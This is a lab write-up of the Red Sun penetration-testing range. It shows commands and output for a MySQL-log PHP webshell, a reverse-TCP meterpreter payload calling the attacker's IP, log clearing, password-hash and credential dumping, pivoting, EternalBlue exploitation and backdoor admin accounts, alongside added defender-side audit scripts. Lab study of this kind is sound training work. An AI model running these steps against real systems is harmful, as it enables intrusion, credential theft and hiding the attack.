Had some free time, so I worked through the 红日靶场 (Red Sun range). It took me a while (I'm still a noob), so I'm writing up the process.
📝 红日靶场 (Red Sun range)
Reference articles:
Host discovery
Victim host: 192.128.52.128
kali: 192.128.52.129
Windows attack box: 192.128.52.133 (192.168.235.145)
Ubuntu attack box: 192.128.235.149
└─$ nmap -sn 192.168.52.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 10:59 EDT
Nmap scan report for 192.168.52.128
Host is up (0.0020s latency).
Nmap scan report for 192.168.52.129
Host is up (0.00067s latency).
Nmap scan report for 192.168.52.141
Host is up (0.0061s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 19.88 seconds
-sn: ping scan only, no port scan
Full port scan
└─$ nmap --min-rate 10000 -p- 192.168.52.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 11:02 EDT
Nmap scan report for 192.168.52.128
Host is up (0.023s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
Nmap done: 1 IP address (1 host up) scanned in 30.51 seconds
TCP scan
└─$ sudo nmap -sT -sV -O -p 80,3306 192.168.52.128
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 20:43 EDT
Nmap scan report for 192.168.52.128
Host is up (0.0019s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open  mysql   MySQL 5.5.53
MAC Address: 00:0C:29:1E:5F:3E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds
UDP scan
(base) ┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p 80,3306 192.168.52.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 20:46 EDT
Nmap scan report for 192.168.52.128
Host is up (0.00072s latency).
PORT     STATE         SERVICE
80/udp   open|filtered http
3306/udp open|filtered mysql
MAC Address: 00:0C:29:1E:5F:3E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds
Web service
Directory scan
(base) ┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://192.168.52.128 -d 1 -w /usr/share/dirb/wordlists/common.txt
by Ben "epi" Risher  ver: 2.10.0
Target Url      │ http://192.168.52.128
Threads         │ 50
Wordlist        │ /usr/share/dirb/wordlists/common.txt
Status Codes    │ All Status Codes!
Timeout (secs)  │ 7
User-Agent      │ feroxbuster/2.10.0
Config File     │ /etc/feroxbuster/ferox-config.toml
Extract Links   │ true
HTTP methods    │ [GET]
Recursion Depth │ 1
Press [ENTER] to use the Scan Management Menu
301 GET 7l 20w 241c http://192.168.52.128/phpmyadmin => http://192.168.52.128/phpmyadmin/
301 GET 7l 20w 241c http://192.168.52.128/phpMyAdmin => http://192.168.52.128/phpMyAdmin/
200 GET 949l 4793w 70877c http://192.168.52.128/phpinfo.php
200 GET 401l 853w 14770c http://192.168.52.128/l.php
200 GET 401l 853w 14770c http://192.168.52.128/
PHP probe: /

phpinfo: /phpinfo.php

phpmyadmin: /phpmyadmin

Weak credentials: root/root
Check whether we have file write permission
SHOW GLOBAL VARIABLES LIKE '%secure%'

Check whether the general query log is enabled
SHOW GLOBAL VARIABLES LIKE '%general%'

It shows as disabled.
Enable it manually
SET GLOBAL general_log = ON

Change the log file path
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'

Visit /test.php

Write the shell into the log
select '<?php eval($_POST[cmd]);?>'

At this point it has actually been written. What matters for a one-liner webshell is that it executes; don't assume it failed just because the page shows a notice and the one-liner itself isn't displayed.
Connect with AntSword (蚁剑)
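From the defender's side, the steps above leave two clear signals: a MySQL server whose general_log_file has been pointed into the web root, and a query log whose entries contain PHP open tags. The following Python audit is an added example (not from the original post) that checks both; the list of web roots, the variable snapshot and the log excerpt are constructed to mirror this lab.

```python
"""Defender-side check for the general_log-to-webroot webshell trick (added example)."""
import re

# Document roots the web server serves; the first is this lab's C:/phpstudy/WWW (assumed list).
WEB_ROOTS = ("C:/phpstudy/WWW", "/var/www/html")
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")


def _norm(path):
    """Normalise separators and case so prefix checks work for Windows and Unix paths."""
    return path.replace("\\", "/").rstrip("/").lower()


def under_web_root(path, roots=WEB_ROOTS):
    """True when `path` lies inside any served document root."""
    p = _norm(path)
    return any(p.startswith(_norm(r) + "/") for r in roots)


def audit_variables(variables):
    """variables: name -> value as from SHOW GLOBAL VARIABLES. Returns a list of findings."""
    findings = []
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: no restriction on where the server writes files")
    log_file = variables.get("general_log_file", "")
    state = variables.get("general_log", "OFF").upper()
    if under_web_root(log_file):
        findings.append(f"general_log_file inside the web root (general_log={state}): {log_file}")
    if log_file.lower().endswith(SCRIPT_EXTS):
        findings.append(f"general_log_file has a server-side script extension: {log_file}")
    return findings


def php_tag_lines(log_lines):
    """Indexes of general-log lines whose query text carries a PHP open tag."""
    return [i for i, line in enumerate(log_lines) if PHP_OPEN_TAG.search(line)]


# Constructed snapshot mirroring the lab: empty secure_file_priv, log redirected into the web root.
SAMPLE_VARS = {"secure_file_priv": "", "general_log": "ON",
               "general_log_file": "C:/phpstudy/WWW/test.php"}
# Constructed general-log excerpt (columns: time, thread id, command, argument).
SAMPLE_LOG = [
    "230821 11:05:10\t    3 Connect\troot@localhost on ",
    "230821 11:05:12\t    3 Query\tSHOW GLOBAL VARIABLES LIKE '%general%'",
    "230821 11:05:40\t    3 Query\tselect '<?php eval($_POST[cmd]);?>'",
]
```

Running `audit_variables(SAMPLE_VARS)` yields three findings and `php_tag_lines(SAMPLE_LOG)` flags only the third line; a healthy server (non-empty secure_file_priv, log kept in the data directory) yields none.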

Here I found that there is another site, yxcms.
Open the AntSword terminal to check our privileges

Confirmed as SYSTEM privileges.
yxcms: /yxcms

The article CMS backend, with default username and password

The backend lets you manage templates

The template code can be edited here to insert a one-liner webshell


Use the content management section to locate which template the code belongs to


Connect with AntSword


msf payload
Generate the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.128 LPORT=10010 -f exe -o hack.exe   # attacker (kali) IP and port
Upload the payload with AntSword and execute it

msf listener
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.235.128   # attacker (kali) IP
set lport 10010             # attacker port
exploit

Session established.
getuid
Check the current user. ps lists processes, including the payload's (shell.exe is the CS payload used later).

Here the payload process msf.exe has PID 1028

The Apache process is 4440

Process migration

To keep the target server from spotting the hack.exe payload we uploaded, we can migrate into another legitimate process.
Here my hack.exe payload's PID is 1028 and Apache's is 4440.
Then clear traces with clearev.

Disable the firewall
run post/windows/manage/enable_rdp

Open remote desktop
rdesktop 192.168.52.128


Dump hashes
meterpreter > hashdump
Result:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:7fd6157f3589812ad3995dc56d1125d1:::
Or use the built-in module:
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against STU1
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/kali/.msf4/loot/20230823091624_default_192.168.235.150_windows.hashes_177787.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY fd4639f4e27c79683ae9fee56b44393f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] whoami:1001:aad3b435b51404eeaad3b435b51404ee:7fd6157f3589812ad3995dc56d1125d1:::
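The dump above is what a defender reviewing this host would want to triage: three of the four accounts carry the NT hash of an empty password, and the LM field is the empty marker throughout. This Python helper is an added example (not from the original post) that parses both output styles shown above and reports empty passwords, stored LM hashes and passwords shared between accounts; the sample input is the lab's own dump as quoted.

```python
"""Triage a pwdump-format hash dump for what a defender should fix (added example)."""
from collections import defaultdict

# Well-known marker values: the empty LM field and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_pwdump(lines):
    """Parse `user:rid:lm:nt:::` lines; tolerates the `[+] ` prefix smart_hashdump prints."""
    accounts = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("[+]"):
            line = line[3:].strip()
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # module chatter or blank line, not a hash record
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def triage(accounts):
    """Findings a defender acts on: empty passwords, stored LM hashes, shared passwords."""
    findings = []
    users_by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings.append(f"{a['user']} (RID {a['rid']}): empty password")
        if a["lm"] != EMPTY_LM:
            findings.append(f"{a['user']}: LM hash still stored (trivially crackable)")
        users_by_nt[a["nt"]].append(a["user"])
    for nt, users in users_by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append(f"same password shared by {sorted(users)}")
    return findings


# The lab's own hashdump output as quoted above, in both the plain and smart_hashdump styles.
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "[*] Dumping password hashes...",
    "[+] liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "[+] whoami:1001:aad3b435b51404eeaad3b435b51404ee:7fd6157f3589812ad3995dc56d1125d1:::",
]
```

`triage(parse_pwdump(SAMPLE_DUMP))` reports empty passwords for Administrator, Guest and liukaifeng01 and nothing for whoami.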
Using kiwi (a mimikatz substitute)
The kiwi module supports both 32-bit and 64-bit systems, but it loads as 32-bit by default, so if the target is 64-bit, loading it directly leaves many functions unusable. For a 64-bit target you must first check the process list and migrate the meterpreter session into a 64-bit process before loading kiwi to read cleartext credentials. 32-bit targets have no such restriction.
Since the target is 64-bit Win7, the next step is to migrate into one of the 64-bit processes.

Found that SYSTEM privileges were needed, so I moved again, to process 516
migrate 516

load kiwi
creds_all

Setting up a proxy with msf
① Connect msf to the victim host
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.235.128   # attacker (kali) IP
set lport 10010             # attacker port
exploit
② Add a route
run post/multi/manage/autoroute

Show the routes
run autoroute -p

Background the session and set up SOCKS
background                          # suspend the session
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 127.0.0.1
options                             # review the parameters in use
exploit

On success a job (attack task) appears

jobs    # check the running jobs
Edit proxychains.conf as shown in the figure

Basically add an entry using the parameters from the SOCKS step above.
(Other tutorials use proxychains4.conf? The error I got said proxychains.conf is the one in use.)

To go through the proxy, just prefix the commands above with proxychains.
Scan for live hosts on the internal network
use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1    # use session 1 (my screenshot used session 2; `sessions -l` lists background sessions)
exploit

Discover live internal hosts via UDP
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit

Taken together, there are three hosts on the internal network: .128 (the victim host used as the proxy), .138 and .141.
Lateral movement
Not sure why this step found so few ports for me.
192.168.52.138
Port scan
Ports 25 and 110 are open
Scan TCP ports 25 and 110
└─$ sudo proxychains nmap -sT -sV -O -p 25,110 192.168.52.138
[sudo] password for kali:
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 11:41 EDT
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.138:110 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.138:25 <--socket error or timeout!
Nmap scan report for 192.168.52.138 (192.168.52.138)
Host is up (0.0014s latency).
PORT    STATE  SERVICE VERSION
25/tcp  closed smtp
110/tcp closed pop3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (94%), Linux 3.2 (94%), Linux 4.4 (94%), Actiontec MI424WR-GEN3I WAP (92%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (91%), Microsoft Windows XP SP3 (86%), Billion WRT610n WAP (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds
192.168.52.141
Port scan
└─$ sudo proxychains nmap --min-rate 10000 -p- 192.168.52.141
[sudo] password for kali:
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 10:05 EDT
Nmap scan report for 192.168.52.141 (192.168.52.141)
Host is up (0.00064s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
25/tcp  open  smtp
110/tcp open  pop3
Nmap done: 1 IP address (1 host up) scanned in 18.84 seconds
Ports 25 and 110 are open
Scan TCP ports 25 and 110
EternalBlue (testing; not sure why port 445 didn't show up in the scan)
Scanning 192.168.52.141 shows it is vulnerable to EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit

Exploitation
First attempt failed, module 1
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.52.141
run
Second attempt failed, module 2
Found that it only supports 64-bit targets, not 32-bit

Third attempt succeeded, module 3

Create a new user 'hack'
net user hack qaz@123 /add   # add a user (needs a strong password that doesn't contain the username)
net user                     # list users

Add it to the administrators group
set COMMAND net localgroup administrators hack /add
exploit
set COMMAND net localgroup administrators
exploit

The later steps of opening port 3386 and using telnet didn't succeed... so I'm leaving them out.
Other
CS payload
Likewise upload the payload with AntSword and run it to check in.
sleep 0
Speeds up the callback. The victim beacons every 60 seconds by default; for the demo we set it to 5, but in practice the interval shouldn't be too short,
as it is easy to spot.

shell systeminfo
Check system information

Dump credentials

Probe for live internal hosts

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
Internal network information gathering
ipconfig /all                                   # local IP and domain
route print                                     # routing table
net view                                        # other host names on the LAN
arp -a                                          # ARP cache
net start                                       # running services
net share                                       # active shares
net share ipc$                                  # enable the ipc share
net share c$                                    # enable the C drive share
net use \\192.168.xx.xx\ipc$ "" /user:""        # null session to 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"username"   # map the C drive share
dir \\192.168.xx.xx\c$\user                     # list the user directory on the C drive of 192.168.xx.xx
net config Workstation                          # computer name, full name, user name, OS version, workstation, domain, logon domain
net user                                        # local users
net user /domain                                # domain users
net localgroup administrators                   # local administrators group (often contains domain users)
net view /domain                                # how many domains there are
net user <username> /domain                     # details of a given domain user
net group /domain                               # groups in the domain and how users are divided among them (only on the DC)
net group <groupname> /domain                   # a given domain group
net group "domain admins" /domain               # domain administrators
net group "domain computers" /domain            # other hosts in the domain
net group "domain controllers" /domain          # domain controllers (there may be several)
tasklist                                        # check for AV processes
wmic useraccount get /all                       # check whether a domain exists

The domain is god.org, the domain controller is OWA$, the domain administrator is Administrator, and the internal subnet is 192.168.52.1/24. We use ping to find the DC's IP.

Add a new user and make it an administrator
whami/Hongri

🤗 Summary
There is still plenty left unfinished: the port scan results differ from other tutorials (not sure which step went wrong), the later persistence work wasn't completed, and opening port 3386 and using telnet didn't succeed, etc.
📎 Reference articles
- Some references
- Referenced articles
- Author:NotionNext
- URL:https://notion-next-6kq6ucszp-youket.vercel.app/article/3a457dac-b9c6-4be9-a7fe-6cbd45438b9b
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!